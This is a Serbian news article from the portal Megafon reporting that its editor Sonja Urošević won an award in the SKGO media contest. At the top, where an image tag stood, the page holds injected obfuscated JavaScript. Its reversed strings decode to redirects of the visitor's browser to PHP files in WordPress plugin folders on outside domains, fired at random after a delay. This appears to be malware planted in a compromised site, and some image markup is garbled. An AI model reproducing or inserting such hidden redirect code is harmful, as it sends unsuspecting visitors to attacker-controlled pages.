sonja_urosevic_fo$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_jovana_djordjevic

Još jedna nagrada za Megafon

Među petoro nagrađenih na osmom medijskom konkursku Stalne konferencije gradova i opština Drugačije od drugih, ove godine je i novinarka i glavna i odgovorna urednica Megafona Sonja Urošević.

U konkurenciji za nagrade bilo je 68 priloga, a odluku o pobednicima konkursa doneo je stručni žiri u sastavu: Nada Gogić, Srđan Bošković, Lana Gedošević, Vladan Samardžić i Zoran Sekulić.

Prema oceni žirija, najbolje priloge pripremili su:

– Milica Alavanja (produkcija Vojvođanska zelena inicijativa), sa prilogom “Tri dana do slobode“;
– Nemanja Stanković (Kurir TV), sa prilogom “Voda života”;
– Sonja Urošević (portal Megafon), sa prilogom “Vesna je omiljena u Vlasotincu, a heroj za celu Srbiju“;
– Predrag Stojković (RTS), sa prilogom “Vrata pakla“;
– Zoran Maksimović (Prva TV), sa prilogom “Prvi korona call centar u Srbiji”.

Osmi medijski konkurs SKGO Drugačije od drugih o praksi u lokalnoj samoupravi za novinare lokalnih, regionalnih i nacionalnih medija, bio je otvoren za radove pripremljene u periodu od 1. januara do 15. oktobra 2020. godine. Organizovan je u okviru programa „Podrška lokalnim samoupravama u Srbiji na putu ka EU – Druga faza“,  koji finansira Vlada Švedske.

“Raspisivanjem konkursa, SKGO je želela da naglasi važnost i ulogu lokalnih vlasti u navedenim oblastima, a u cilju poboljšanja kvaliteta usluga koje pružaju građanima. Želeli smo i da istaknemo važnost medijskog izveštavanja o ovim temama, podignemo svest građana, ali i da pružimo podršku novinarima koji su se tokom godine bavili temama koje nisu uvek atraktivne”, saopšteno je.

Nagrade će, zbog epidemiološke situacije, uz mere zaštite biti uručene u prostorijama SKGO.

O Sonji Urošević

to_jovana_djordjevic.jpg”>to_jovana_djordjevic-300×200.jpg” alt=”nagrada” class=”wp-image-15998″/>
Foto – Jovana Đorđević

Sonja Urošević jedan je od osnivača Megafona, kao i novinarka i glavna i odgovorna urednica našeg portala. Novinarstvom se bavi više od decenije. Većinu karijere provela je kao dopisnik nacionalnih televizija. Na konkursu Drugačije od drugih već je jednom nagrađena i to 2017. godine. Sledile su je nagrada Cvet jednakosti i diploma Intefera u 2018. godini.

Add a Comment

Your email address will not be published. Required fields are marked *